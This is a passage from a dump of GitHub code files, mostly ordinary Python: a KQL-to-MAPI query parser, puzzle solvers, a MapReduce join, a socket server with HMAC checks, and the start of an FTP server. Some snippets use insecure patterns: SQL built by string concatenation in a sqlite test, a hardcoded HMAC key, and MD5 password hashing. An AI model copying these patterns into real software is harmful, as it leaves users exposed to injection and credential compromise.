range(EXPERIMENT_COUNT):\n # Create a container to hold items.\n container_list = ContainerList()\n item_count = 0\n for _ in range(0, ITEM_COUNT):\n item_count += 1\n random_colour = random.randint(0, 2)\n item = Item(random_colour)\n container_list.add_item(item)\n\n # Store results\n array_to_store_data.append(len(container_list))\n short_results_log = f'{item_count} in {len(container_list)}: {container_list.small_log()}\\n'\n file_to_save.write(short_results_log)\n\n file_to_save.close()\n\n print(f'Minimum container count: {min(array_to_store_data)}\\n'\n f'Maximum container count: {max(array_to_store_data)}')\n\n print(\"Experiments are finished.\")\n","repo_name":"electricalgorithm/BinPackingWithColor","sub_path":"simulation.py","file_name":"simulation.py","file_ext":"py","file_size_in_byte":5414,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"31066429939","text":"import MapReduce\nimport sys\n\n\"\"\"\nImplementation of Join Operation in the Simple Python MapReduce Framework\n\"\"\"\n\nmr = MapReduce.MapReduce()\n\n# =============================\n# Do not modify above this line\n\ndef mapper(record):\n # key: document identifier\n # value: document contents\n key = record[1]\n mr.emit_intermediate(key,record)\n\ndef reducer(key, list_of_values):\n # key: word\n # value: list of occurrence counts\n order_list = []\n line_list = []\n for v in list_of_values:\n if v[0]==\"order\":\n order_list=v\n else:\n line_list.append(v)\n for line in line_list:\n \tmr.emit(order_list + line)\n\n# Do not modify below this line\n# =============================\nif __name__ == '__main__':\n inputdata = open(sys.argv[1])\n mr.execute(inputdata, mapper, reducer)\n","repo_name":"smukh93/Data_Manipulation_At_Scale","sub_path":"Assignment_3/join.py","file_name":"join.py","file_ext":"py","file_size_in_byte":824,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"3343292536","text":"from ipaddress import IPv4Address,summarize_address_range\nimport argparse\n\ndef parse_args():\n #setting up 
argparser\n parser = argparse.ArgumentParser(description='subnetting tool')\n parser.add_argument('--start',required=True, help='enter ipv4 ip address')\n parser.add_argument('--end',required=True, help='enter ipv4 network')\n args = parser.parse_args()\n return args\n\ndef generate_subnets(start,end):\n return [ipaddr for ipaddr in summarize_address_range(IPv4Address(start),IPv4Address(end))]\n\ndef main():\n get_args = parse_args()\n for i in generate_subnets(get_args.start,get_args.end): print('{}'.format(i))\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"hugoreyes83/scripts","sub_path":"available_subnets.py","file_name":"available_subnets.py","file_ext":"py","file_size_in_byte":679,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"15141013837","text":"import datetime\nimport re\n\nimport dateutil.parser\n\n\"\"\"This module converts Microsoft KQL (Keyword Query Language)\nqueries into MAPI restrictions, as used when for example searching\nfor specific mails or users.\n\nTo achieve this, it uses a hand-written parser, using the building\nblocks in parse.py.\n\"\"\"\n\nfrom MAPI import (\n FL_SUBSTRING, FL_IGNORECASE, RELOP_GT, RELOP_EQ, PT_BOOLEAN, PT_UNICODE,\n BMR_EQZ, BMR_NEZ, PT_SYSTIME, RELOP_GE, RELOP_LT, RELOP_LE, RELOP_NE,\n PT_SHORT, PT_LONG, PT_LONGLONG, PT_FLOAT, PT_DOUBLE, MNID_ID, MNID_STRING,\n PT_MV_UNICODE, MAPI_TO, MAPI_CC, MAPI_BCC\n)\n\nfrom MAPI.Tags import (\n PR_SUBJECT_W, PR_BODY_W, PR_MESSAGE_DELIVERY_TIME, PR_HASATTACH,\n PR_MESSAGE_SIZE, PR_MESSAGE_FLAGS, MSGFLAG_READ, PR_SENDER_NAME_W,\n PR_DISPLAY_NAME_W, PR_SENT_REPRESENTING_NAME_W, PR_SMTP_ADDRESS_W,\n PR_MESSAGE_ATTACHMENTS, PR_ATTACH_LONG_FILENAME_W, PR_MESSAGE_RECIPIENTS,\n PR_RECIPIENT_TYPE, PR_SENDER_EMAIL_ADDRESS_W, PR_EMAIL_ADDRESS_W,\n PR_GIVEN_NAME_W, PR_COMPANY_NAME_W, PR_SURNAME_W, PR_OFFICE_LOCATION_W,\n PR_MOBILE_TELEPHONE_NUMBER_W, PR_BUSINESS_TELEPHONE_NUMBER_W,\n PR_POSTAL_CODE_W, PR_BIRTHDAY, PR_PREFERRED_BY_NAME_W,\n PR_RESPONSIBILITY, PR_USER_NAME, PR_FOLDER_CHILD_COUNT,\n PR_CONTENT_COUNT, PR_PARENT_ENTRYID, PR_CONTENT_UNREAD\n)\nfrom MAPI.Struct import (\n SOrRestriction, SAndRestriction, SNotRestriction, SContentRestriction,\n SPropValue, SPropertyRestriction, SBitMaskRestriction, SSubRestriction,\n)\n\nfrom MAPI.Defs import PROP_TYPE\n\nfrom .errors import ArgumentError\nfrom .restriction import Restriction\nfrom .defs import PSETID_Address, PS_PUBLIC_STRINGS\n# Backwards compatible import for older python-mapi versions without datetime_to_filetime available in MAPI.Time\nfrom . import utils as _utils\n\nfrom .parse import (\n ParserInput, Parser, Char, CharSet, ZeroOrMore, OneOrMore, Sequence,\n Choice, Optional, Wrapper, NoMatch\n)\n\n# TODO such grouping: 'subject:(fresh exciting)'\n# TODO Regex: avoid substr\n# TODO OneOrMore(regex) not needed?\n# TODO operator associativity/precedence (e.g. 'NOT a AND b'), check MSG\n# TODO escaping double quotes\n# TODO asterisk not implicit for phrases\n# TODO relative dates rel. to timezone (e.g. \"received:today\")\n# TODO graph does not support 'size>\"10 KB\" and such? 
we now roll our own\n# TODO email matching on to/cc/bcc (PR_SEARCH_KEY/PR_EMAIL_ADDRESS?)\n# TODO sender:user2@domain.com OR category:blue doesn't work, even if they\n# separately work?\n\nEMAIL1_NAME = (PSETID_Address, MNID_ID, 0x8083, PT_UNICODE) # TODO merge\nCATEGORY_NAME = (PS_PUBLIC_STRINGS, MNID_STRING, 'Keywords', PT_MV_UNICODE)\n\nRECIP_PROPS = [PR_DISPLAY_NAME_W, PR_EMAIL_ADDRESS_W, PR_SMTP_ADDRESS_W]\n\nMESSAGE_KEYWORD_PROP = {\n 'subject': PR_SUBJECT_W,\n 'body': PR_BODY_W,\n 'content': PR_BODY_W, # TODO what does content mean\n 'received': PR_MESSAGE_DELIVERY_TIME,\n 'hasAttachment': PR_HASATTACH,\n 'hasAttachments': PR_HASATTACH,\n 'size': PR_MESSAGE_SIZE,\n 'read': (PR_MESSAGE_FLAGS, MSGFLAG_READ),\n 'from': PR_SENT_REPRESENTING_NAME_W, # TODO email address\n # TODO why does 'from:user1@domain.com' work with just PR_SENDER_NAME_W!?\n 'sender': [PR_SENDER_NAME_W, PR_SENDER_EMAIL_ADDRESS_W],\n 'attachment': (PR_MESSAGE_ATTACHMENTS, PR_ATTACH_LONG_FILENAME_W),\n 'category': CATEGORY_NAME,\n 'to': (PR_MESSAGE_RECIPIENTS, RECIP_PROPS, MAPI_TO),\n 'cc': (PR_MESSAGE_RECIPIENTS, RECIP_PROPS, MAPI_CC),\n 'bcc': (PR_MESSAGE_RECIPIENTS, RECIP_PROPS, MAPI_BCC),\n 'participants': (PR_MESSAGE_RECIPIENTS, RECIP_PROPS, None),\n}\n\nCONTACT_KEYWORD_PROP = {\n 'name': PR_DISPLAY_NAME_W,\n 'email': EMAIL1_NAME,\n}\n\nUSER_KEYWORD_PROP = {\n 'name': PR_DISPLAY_NAME_W,\n 'givenName': PR_GIVEN_NAME_W,\n 'preferredName': PR_PREFERRED_BY_NAME_W,\n 'surname': PR_SURNAME_W,\n 'userPrincipalName': PR_USER_NAME,\n 'mail': PR_SMTP_ADDRESS_W,\n 'mobilePhone': PR_MOBILE_TELEPHONE_NUMBER_W,\n 'postalCode': PR_POSTAL_CODE_W,\n 'birthday': PR_BIRTHDAY,\n 'companyName': PR_COMPANY_NAME_W,\n 'officeLocation': PR_OFFICE_LOCATION_W,\n 'businessPhones': PR_BUSINESS_TELEPHONE_NUMBER_W,\n 'responsibilities': PR_RESPONSIBILITY,\n}\n\nFOLDER_KEYWORD_PROP = {\n 'displayName': PR_DISPLAY_NAME_W,\n 'childFolderCount': PR_FOLDER_CHILD_COUNT,\n 'parentFolderId': PR_PARENT_ENTRYID,\n 'totalItemCount': PR_CONTENT_COUNT,\n 'unreadItemCount': PR_CONTENT_UNREAD,\n}\n\nTYPE_KEYWORD_PROPMAP = {\n 'message': MESSAGE_KEYWORD_PROP,\n 'contact': CONTACT_KEYWORD_PROP,\n 'user': USER_KEYWORD_PROP,\n 'folder': FOLDER_KEYWORD_PROP,\n}\n\nDEFAULT_PROPTAGS = {\n 'message': [PR_SUBJECT_W, PR_BODY_W, PR_SENT_REPRESENTING_NAME_W],\n 'contact': [PR_DISPLAY_NAME_W, EMAIL1_NAME],\n 'user': [PR_DISPLAY_NAME_W, PR_SMTP_ADDRESS_W],\n 'folder': [PR_DISPLAY_NAME_W],\n}\n\nOP_RELOP = {\n '<': RELOP_LT,\n '>': RELOP_GT,\n '>=': RELOP_GE,\n '<=': RELOP_LE,\n '<>': RELOP_NE,\n}\n\n\ndef _interval_restriction(proptag, start, end):\n start = _utils.datetime_to_filetime(start)\n end = _utils.datetime_to_filetime(end)\n\n return SAndRestriction([\n SPropertyRestriction(RELOP_GE, proptag, SPropValue(proptag, start)),\n SPropertyRestriction(RELOP_LT, proptag, SPropValue(proptag, end))\n ])\n\n# AST node\nclass Term(object):\n def __init__(self, sign=None, field=None, op=None, value=None, hoepa=None):\n self.sign = sign\n self.field = field\n self.op = op\n self.value = value\n\n def restriction(self, type_, store):\n if self.field:\n # determine proptag for term, eg 'subject'\n proptag = TYPE_KEYWORD_PROPMAP[type_][self.field]\n flag = None\n subobj = None\n recipient_type = None\n\n # property in sub-object (attachments/recipient): sub-restriction\n if isinstance(proptag, tuple):\n if(proptag[0]) == PR_MESSAGE_ATTACHMENTS:\n subobj, proptag = proptag\n elif(proptag[0]) == PR_MESSAGE_RECIPIENTS:\n subobj, proptag, recipient_type = proptag\n elif len(proptag) 
== 2:\n proptag, flag = proptag\n\n # named property: resolve local proptag\n elif len(proptag) == 4:\n proptag = store._name_id(proptag[:3]) | proptag[3]\n\n # make restriction on proptag(s)\n if isinstance(proptag, list):\n restr = SOrRestriction([\n self.prop_restriction(proptag, flag) for proptag in proptag\n ])\n else:\n restr = self.prop_restriction(proptag, flag)\n\n # turn restriction into sub-restriction\n if subobj:\n if recipient_type is not None:\n restr = SAndRestriction([\n restr,\n SPropertyRestriction(\n RELOP_EQ,\n PR_RECIPIENT_TYPE,\n SPropValue(PR_RECIPIENT_TYPE, recipient_type)\n )\n ])\n restr = SSubRestriction(subobj, restr)\n\n else:\n defaults = [(store._name_id(proptag[:3]) | proptag[3])\n if isinstance(proptag, tuple) else proptag\n for proptag in DEFAULT_PROPTAGS[type_]]\n\n restr = SOrRestriction([\n SContentRestriction(\n FL_SUBSTRING | FL_IGNORECASE,\n p,\n SPropValue(p, self.value)\n ) for p in defaults\n ])\n\n if self.sign == '-':\n restr = SNotRestriction(restr)\n\n return restr\n\n def prop_restriction(self, proptag, flag):\n # comparison operator\n if self.op in ('<', '>', '>=', '<=', '<>'):\n if PROP_TYPE(proptag) == PT_SYSTIME:\n d = dateutil.parser.parse(self.value)\n d = _utils.datetime_to_filetime(d)\n restr = SPropertyRestriction(\n OP_RELOP[self.op],\n proptag,\n SPropValue(proptag, d)\n )\n else:\n value = self.value\n unit = ''\n if [x for x in ('KB', 'MB', 'GB') if value.endswith(x)]:\n value, unit = value[:-2], value[-2:]\n\n value = int(value)\n\n if unit == 'KB':\n value *= 1024\n elif unit == 'MB':\n value *= 1024**2\n elif unit == 'GB':\n value *= 1024**3\n\n restr = SPropertyRestriction(\n OP_RELOP[self.op],\n proptag,\n SPropValue(proptag, value)\n )\n\n # contains/equals operator\n elif self.op in (':', '='):\n if PROP_TYPE(proptag) == PT_UNICODE:\n restr = SContentRestriction(\n FL_SUBSTRING | FL_IGNORECASE,\n proptag,\n SPropValue(proptag, self.value)\n )\n\n elif flag or PROP_TYPE(proptag) == PT_BOOLEAN:\n if flag:\n restr = SBitMaskRestriction(\n BMR_NEZ if self.value in ('yes', 'true') else BMR_EQZ,\n proptag,\n flag\n )\n else:\n restr = SPropertyRestriction(\n RELOP_EQ,\n proptag,\n SPropValue(proptag, self.value in ('yes', 'true'))\n )\n\n elif PROP_TYPE(proptag) == PT_MV_UNICODE:\n proptag2 = (proptag ^ PT_MV_UNICODE) | PT_UNICODE # funky!\n restr = SContentRestriction(\n FL_SUBSTRING | FL_IGNORECASE,\n proptag,\n SPropValue(proptag2, self.value)\n )\n\n elif (PROP_TYPE(proptag) in \\\n (PT_SHORT, PT_LONG, PT_LONGLONG, PT_FLOAT, PT_DOUBLE)):\n conv = float if PROP_TYPE(proptag) in (PT_FLOAT, PT_DOUBLE) \\\n else int\n if '..' 
in self.value:\n val1, val2 = self.value.split('..')\n restr = SAndRestriction([\n SPropertyRestriction(\n RELOP_GE,\n proptag,\n SPropValue(proptag, conv(val1))\n ),\n SPropertyRestriction(\n RELOP_LT,\n proptag,\n SPropValue(proptag, conv(val2))\n )\n ])\n else:\n restr = SPropertyRestriction(\n RELOP_EQ,\n proptag,\n SPropValue(proptag, conv(self.value))\n )\n\n elif PROP_TYPE(proptag) == PT_SYSTIME:\n if self.value == 'today':\n d = datetime.datetime.now().date()\n d2 = d + datetime.timedelta(days=1)\n restr = _interval_restriction(proptag, d, d2)\n\n elif self.value == 'yesterday':\n d2 = datetime.datetime.now().date()\n d = d2 - datetime.timedelta(days=1)\n restr = _interval_restriction(proptag, d, d2)\n\n elif self.value == 'this week':\n d2 = datetime.datetime.now()\n d = d2.date() - datetime.timedelta(days=d2.weekday())\n restr = _interval_restriction(proptag, d, d2)\n\n elif self.value == 'this month':\n d2 = datetime.datetime.now()\n d = d2.date() - datetime.timedelta(days=d2.day-1)\n restr = _interval_restriction(proptag, d, d2)\n\n elif self.value == 'last month':\n now = datetime.datetime.now()\n d2 = now.date() - datetime.timedelta(days=now.day-1)\n d = (d2 - datetime.timedelta(days=1)).replace(day=1)\n restr = _interval_restriction(proptag, d, d2)\n\n elif self.value == 'this year':\n d2 = datetime.datetime.now()\n d = datetime.datetime(d2.year, 1, 1)\n restr = _interval_restriction(proptag, d, d2)\n\n elif self.value == 'last year':\n now = datetime.datetime.now()\n d2 = datetime.datetime(now.year, 1, 1)\n d = datetime.datetime(d2.year-1, 1, 1)\n restr = _interval_restriction(proptag, d, d2)\n\n elif '..' in self.value:\n date1, date2 = self.value.split('..') # TODO hours etc\n d = dateutil.parser.parse(date1)\n d2 = dateutil.parser.parse(date2)\n restr = _interval_restriction(proptag, d, d2)\n\n else:\n d = dateutil.parser.parse(self.value) # TODO hours etc\n d2 = d + datetime.timedelta(days=1)\n restr = _interval_restriction(proptag, d, d2)\n\n return restr\n\nclass Operation(object):\n def __init__(self, op=None, args=None):\n self.op = op\n self.args = args\n\n def restriction(self, type_, store):\n if self.op == 'AND':\n return SAndRestriction(\n [arg.restriction(type_, store) for arg in self.args]\n )\n elif self.op == 'OR':\n return SOrRestriction(\n [arg.restriction(type_, store) for arg in self.args]\n )\n elif self.op == 'NOT':\n return SNotRestriction(\n self.args[0].restriction(type_, store)\n )\n\n# build parser\n\nclass Regex(Parser):\n def __init__(self, regex):\n self._re = re.compile(regex)\n\n def parse(self, parser_input) :\n if parser_input.remaining() == 0:\n return NoMatch()\n rest = parser_input._data[parser_input._position:] # TODO slow\n match = self._re.match(rest)\n if not match:\n return NoMatch()\n else:\n n = match.end()\n parser_input.read(n)\n parser_input.inc_position(n)\n return self.match(rest[:n])\n\ndef _build_parser():\n whitespace = CharSet(' ')\n\n alphaspace = Regex(r'[\\w \\-+*@.]+')\n alphaplus = Regex(r'[\\w\\-+:<>=@.]+')\n\n word = OneOrMore(Regex(r'[\\w+\\-\\*@\\./]'))\n word.modifier = lambda t: ''.join(t)\n\n text = OneOrMore(alphaspace)\n text.modifier = lambda t: ''.join(t)\n\n quoted = Sequence(Char('\"'), text, Char('\"'))\n quoted.modifier = lambda t: ''.join(t)[1:-1]\n\n value = Choice(word, quoted)\n\n def op(s):\n operator = Sequence(*(Char(c) for c in s))\n operator.modifier = lambda t: ''.join(t)\n return operator\n\n operator = Choice(op(':'), op('='), op('<='), op('>='), op('<>'),\n op('<'), op('>'))\n\n sign = 
CharSet('+-')\n\n term = Sequence(Optional(sign), Optional(Sequence(word, operator)), value)\n term.modifier = lambda t: Term(\n sign=t[0] if t[0] else None,\n field=t[1][0] if t[1] else None,\n op=t[1][1] if t[1] else None,\n value=t[2],\n hoepa=t\n )\n\n termplus = OneOrMore(alphaplus)\n termplus.modifier = lambda t: ''.join(t)\n\n term_fallback = Sequence(ZeroOrMore(whitespace), Choice(term, termplus))\n term_fallback.modifier = lambda t: \\\n (Term(value=t[1]) if not isinstance(t[1], Term) else t[1])\n\n lpar = Sequence(ZeroOrMore(whitespace), op('('))\n rpar = Sequence(ZeroOrMore(whitespace), op(')'))\n\n expr = Wrapper()\n\n bracketed = Sequence(lpar, expr, rpar)\n bracketed.modifier = lambda t: t[1]\n\n unit = Choice(bracketed, term_fallback)\n\n and_ = Sequence(ZeroOrMore(whitespace), op('AND'))\n and_.modifier = lambda t: 'AND'\n or_ = Sequence(ZeroOrMore(whitespace), op('OR'))\n or_.modifier = lambda t: 'OR'\n not_ = Sequence(ZeroOrMore(whitespace), op('NOT'))\n not_.modifier = lambda t: 'NOT'\n\n wsexpr = Sequence(ZeroOrMore(whitespace), expr)\n wsexpr.modifier = lambda t: t[1]\n\n wsexpr2 = Sequence(OneOrMore(whitespace), expr)\n wsexpr2.modifier = lambda t: t[1]\n\n andor = Sequence(unit,\n Optional(Sequence(Optional(Choice(and_, or_)),\n Choice(bracketed, wsexpr))))\n def modifier(t):\n if t[1] is None:\n return t[0]\n else:\n return Operation(op=t[1][0] or 'AND', args=[t[0], t[1][1]])\n andor.modifier = modifier\n\n nott = Sequence(not_, Choice(bracketed, wsexpr2))\n nott.modifier = lambda t: Operation(op=t[0], args=[t[1]])\n\n expr.parser = Choice(nott, andor)\n\n return expr\n\n_PARSER = _build_parser()\n\ndef _query_to_restriction(query, type_, store):\n query = str(query)\n try:\n ast = _PARSER.parse(ParserInput(query)).value\n return Restriction(ast.restriction(type_, store))\n except Exception:\n raise ArgumentError(\"could not process query\")\n","repo_name":"Kopano-dev/kopano-core","sub_path":"swig/python/kopano/kopano/query.py","file_name":"query.py","file_ext":"py","file_size_in_byte":17412,"program_lang":"python","lang":"en","doc_type":"code","stars":57,"dataset":"github-code","pt":"7"} +{"seq_id":"71734498144","text":"# Idea: build a directed graph\n# vertices = grid squares\n# edges = (v1, v2) where v1 is adjacent to v2 and height(v1) >= height(v2)-1\n# find the shortest path from S to E \n\nimport networkx as nx\nimport logging\n\n# graph: see 2021/a15_chiton.py\n\nclass HillClimbingAlgorithm:\n\n # check whether we can climb from src to target\n def can_climb(self, src, target):\n if src == 'S':\n src = 'a'\n elif target == 'E':\n target = 'z'\n return ord(src) >= ord(target) - 1\n\n # adds an edge from start to end in graph G\n def add_edge(self, lines, s_row, s_col, e_row, e_col, G):\n s_height = lines[s_row][s_col]\n e_height = lines[e_row][e_col]\n logging.debug(\"add edge: ({},{},{}) -> ({},{},{})\".format(s_row, s_col, s_height, e_row, e_col, e_height))\n G.add_edge((s_row, s_col, s_height), (e_row, e_col, e_height))\n\n def __init__(self, lines):\n # build a directed graph from the input. We use (row, col) as node identifiers\n G = nx.DiGraph()\n for row in range(0, len(lines)):\n for col in range(0, len(lines[row])):\n height = lines[row][col]\n if height == 'S':\n self.start = (row, col, height)\n elif height == 'E':\n self.end = (row, col, height)\n #print(\"{}/{} : {}\".format(row, col, height))\n # N neighbour max 1 higher? 
add connection to N\n if row > 0 and self.can_climb(height, lines[row-1][col]):\n self.add_edge(lines, row, col, row-1, col, G)\n #G.add_edge((row, col), (row-1, col))\n # S neighbour max 1 higher? add connection to S\n if (row < len(lines)-1) and self.can_climb(height, lines[row+1][col]):\n self.add_edge(lines, row, col, row+1, col, G)\n #G.add_edge((row, col), (row+1, col))\n # W neighbour max 1 higher? add connection to W\n if col > 0 and self.can_climb(height, lines[row][col-1]):\n self.add_edge(lines, row, col, row, col-1, G)\n # G.add_edge((row, col), (row, col-1))\n # E neighbour max 1 higher? add connection to E\n if (col < len(lines[row])-1) and self.can_climb(height, lines[row][col+1]):\n self.add_edge(lines, row, col, row, col+1, G)\n #G.add_edge((row, col), (row, col+1))\n logging.info(\"read graph: {}\".format(G))\n self.G = G\n\n\n def read_input_file(filename):\n with open(filename) as f:\n lines = [l.rstrip() for l in f.readlines()]\n return HillClimbingAlgorithm(lines)\n\n def solve_part_I(self):\n path = nx.shortest_path(self.G, self.start, self.end) \n logging.info(\"shortest path: {}\".format(path))\n return len(path) - 1\n\n def solve_part_II(self):\n starting_points = [n for n in nx.nodes(self.G) if n[2] == 'a']\n paths = [] \n for sp in starting_points:\n try:\n path = nx.shortest_path(self.G, sp, self.end)\n paths.append(path)\n except nx.NetworkXNoPath as e:\n logging.info(\"exception occurred: {}\".format(e))\n \n logging.info(\"shortest paths from each a: {}\".format(paths))\n return min(len(p) for p in paths)-1\n\nif __name__ == '__main__':\n logging.basicConfig(level=logging.INFO)\n #logging.basicConfig(level=logging.DEBUG)\n hca = HillClimbingAlgorithm.read_input_file('input.txt')\n print(\"{} {}\".format(hca.solve_part_I(), hca.solve_part_II()))\n\n","repo_name":"frankschmitt/advent_of_code","sub_path":"2022/12-hill_climbing_algorithm/HillClimbingAlgorithm.py","file_name":"HillClimbingAlgorithm.py","file_ext":"py","file_size_in_byte":3658,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"2624728920","text":"# serversocket.py\n\nimport hashlib\nimport socket\nimport hmac\n\nHOST = \"127.0.0.1\" # Standard loopback interface address (localhost)\nPORT = 3030 # Port to listen on (non-privileged ports are > 1023)\nwith socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:\n s.bind((HOST, PORT))\n s.listen()\n conn, addr = s.accept()\n with conn:\n print(f\"Connected by {addr}\")\n while True:\n data = conn.recv(2048)\n if(len(data.decode('utf-8'))!=0):\n transf= data.decode('utf-8').split(\":\")[0]\n resumen=data.decode('utf-8').split(\":\")[1]\n nonce=data.decode('utf-8').split(\":\")[2]+\"\\n\"\n verifier= False\n with open(\"./almacenamiento/nonces.txt\", 'r+') as file:\n lines = file.readlines()\n if nonce not in lines:\n file.writelines(nonce)\n else:\n print(\"Transacción con NONCE repetido\")\n verifier= True\n maker=hmac.new(b\"1234567890\", bytes(transf,\"utf-8\"), hashlib.sha256)\n digest=maker.hexdigest()\n if(digest==resumen and verifier==False):\n print(\"Mensaje íntegro\")\n with open(\"./almacenamiento/transferencias.txt\", 'a+') as f:\n f.writelines(data.decode('utf-8').split(\":\")[0])\n else:\n print(\"Mensaje no íntegro\")\n if not data:\n break\n 
conn.sendall(data)","repo_name":"Security-Team-18/PAI2","sub_path":"serversocket.py","file_name":"serversocket.py","file_ext":"py","file_size_in_byte":1561,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
{"seq_id":"71633621983","text":"from nltk.classify.util import accuracy\nfrom nltk.corpus import movie_reviews\n\nimport zaCode.ClassifierTrainer as ClassifierTrainer\nimport zaCode.Toolbox as Toolbox\n\n\ndef makePrediction():\n\n labels = movie_reviews.categories()\n print(\"Labels for reviews are: {}\\n\".format(labels) )\n\n labeled_words = [(label, movie_reviews.words(categories=[label])) for label in labels]\n print(\"Labeled words:{}\\n\".format(labeled_words[:10]))\n\n high_info_words = set(Toolbox.high_information_words(labeled_words))\n print(\"High information words:{}\\n\".format(list(high_info_words)[:10]))\n\n feat_det = lambda words: Toolbox.bag_of_words_in_set(words, high_info_words)\n\n lfeats = Toolbox.label_feats_from_corpus(movie_reviews, feature_detector=feat_det)\n\n train_feats, test_feats = Toolbox.split_label_feats(lfeats)\n\n mv_classifier = ClassifierTrainer.trainClassifier(train_feats)\n\n accuracyScore = accuracy(mv_classifier, test_feats)\n\n print(\"Accuracy is {}\".format(accuracyScore))\n\nif __name__ == '__main__':\n\n makePrediction()\n\n\n","repo_name":"Gliganu/FLT_SentimentAnalysis","sub_path":"zaCode/MainScript.py","file_name":"MainScript.py","file_ext":"py","file_size_in_byte":1053,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
{"seq_id":"38563774521","text":"import sqlite3\nimport unittest\n\nclass c1(unittest.TestCase):\n\n def setUp(self):\n self.con = sqlite3.connect(\"employee.db\")\n self.code =\"11\"\n self.name = \"akash\"\n def tearDown(self):\n self.code=\"0\"\n self.name = \"\"\n self.con.close()\n\n def test1(self):\n res = self.con.execute(\"SELECT empname FROM empdata WHERE empcode = \"+self.code)\n for i in res:\n fetchname =i[0]\n\n self.assertEqual(fetchname,self.name)\n\nif __name__ == \"__main__\":\n unittest.main()","repo_name":"AK7795/psm","sub_path":"assign3.py","file_name":"assign3.py","file_ext":"py","file_size_in_byte":534,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
{"seq_id":"22939552485","text":"'''\r\nCounter of characters, words, or phrases in a text\r\n'''\r\ndef concatenarCaracteres():\r\n entrada_usuario = input(\"Enter a word or phrase \").casefold().split() #Note this approach\r\n caracter_a_contar =input(\"Which character do you want to count?\\n\").casefold()\r\n palabra_final = \"\".join(entrada_usuario)\r\n cuenta_caracter = palabra_final.count(caracter_a_contar)\r\n \r\n return f'Your word or phrase is: {palabra_final}\\nThe character \"{caracter_a_contar}\" appears {cuenta_caracter} times.'\r\n\r\nprint(concatenarCaracteres())","repo_name":"folkearen/workspaceOL","sub_path":"Python/Ejericios propios/contadordecaracteres.py","file_name":"contadordecaracteres.py","file_ext":"py","file_size_in_byte":542,"program_lang":"python","lang":"es","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"}
{"seq_id":"24371633166","text":"'''\nGiven two strings S and T, return if they are equal when both are typed into empty text editors. 
# means a backspace character.\n\nExample 1:\n\nInput: S = \"ab#c\", T = \"ad#c\"\nOutput: true\nExplanation: Both S and T become \"ac\".\n\nNote:\n\n1 <= S.length <= 200\n1 <= T.length <= 200\nS and T only contain lowercase letters and '#' characters.\nFollow up:\n\nCan you solve it in O(N) time and O(1) space?\n\nhttps://leetcode.com/explore/challenge/card/30-day-leetcoding-challenge/529/week-2/3291/\n\n'''\nfrom typing import List\n\n\nclass Solution:\n\n def backspace(self, S):\n myList = []\n for each in S:\n if(each != '#'):\n myList.append(each)\n else:\n if(len(myList)): myList.pop()\n return (''.join(myList))\n\n def backspaceCompare(self, S: str, T: str) -> bool:\n return(self.backspace(S) == self.backspace(T))\n\n\nif __name__ == \"__main__\":\n sol = Solution()\n S = \"a#c\"\n T = \"b\"\n print(sol.backspaceCompare(S, T))\n","repo_name":"arsaikia/Data_Structures_and_Algorithms","sub_path":"Data Structures and Algorithms/Python/LeetCode/Backspace String Compare.py","file_name":"Backspace String Compare.py","file_ext":"py","file_size_in_byte":991,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"71354953823","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n# Author: DBQ(Du Baoqiang)\n\nimport socketserver,socket,time\nimport configparser,subprocess\nimport os,sys,hashlib,json,re\n\nsys.path.append(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))\nfrom config import settings\nfrom lib import log\n\n\nclass ProgressBar():\n '''\n 进度条类\n '''\n def __init__(self, width=100):\n self.last_x = -1\n self.width = width\n\n def update(self, x):\n '''\n 进度条方法\n :param x:\n :return:\n '''\n if self.last_x == int(x): return False\n self.last_x = int(x)\n pointer = int(self.width * (x / 100.0))\n sys.stdout.write( '\\r%d%% [%s]' % (int(x), '#' * pointer + '.' 
* (self.width - pointer)))\n sys.stdout.flush()\n if x == 100: print()\n\n\ndef GetConfig(servertype,key):\n '''\n 获取配置文件中的参数的函数\n :param servertype: 接受用户传入一个类型,有两个字段, client和server\n :param key: key是接受用户传入的要获取的key值,如ip\n :return: 如果获取成功将return 获取的结果\n '''\n config = configparser.ConfigParser()\n config.read(settings.CONFIG,encoding='utf-8') #读取配置文件\n\n if config.has_section(servertype):\n return config.get(servertype,key)\n else:\n return False\n\n\ndef MD5(password):\n '''\n 用md5校验密码的函数\n :param password: 接受用户传入的一个密码\n :return: 返回一个hash过后的密码\n '''\n result = hashlib.md5(bytes('fe!49sKQe3Xe8',encoding='utf-8')) #添加填充字符,防止暴库\n result.update(bytes(password,encoding='utf-8'))\n\n return result.hexdigest() #return加密后的密码\n\n\ndef md5sum(filename):\n '''\n 文件完整性校验\n :param filename: 接受用户输入一个文件\n :return: 返回给用户一个值\n '''\n f = open(filename,'rb')\n content = f.read()\n f.close()\n\n m = hashlib.md5(content)\n file_md5 = m.hexdigest()\n\n return file_md5\n\n\nclass MyFtpServer(socketserver.BaseRequestHandler):\n '''\n FTPServer 类\n '''\n def handle(self):\n '''\n handle方法\n :return:\n '''\n welcome_msg = '''Connected to %s\\n220 (DBQ FTPServer %s)'''%(socket.gethostname(),settings.VERSION)\n server_respone = {'message':welcome_msg,\"hostname\":socket.gethostname()}\n self.request.sendall(bytes(json.dumps(server_respone),encoding='utf-8'))\n self.login()\n self.task_run()\n\n\n def task_run(self):\n '''\n 服务器运行方法\n :return:\n '''\n while True:\n client_respone = self.request.recv(1024)\n if len(client_respone) == 0:continue\n\n client_respone_str = json.loads(client_respone.decode()) #接受客户端发送的指令和代码\n\n if client_respone_str.get(\"status\") == 220: #如果发送220代码,要退出登录\n res = self.logout(self.user) #退出登录\n if res:\n server_respone = {\"status\":221,\"message\":\"Goodbye!\"}\n 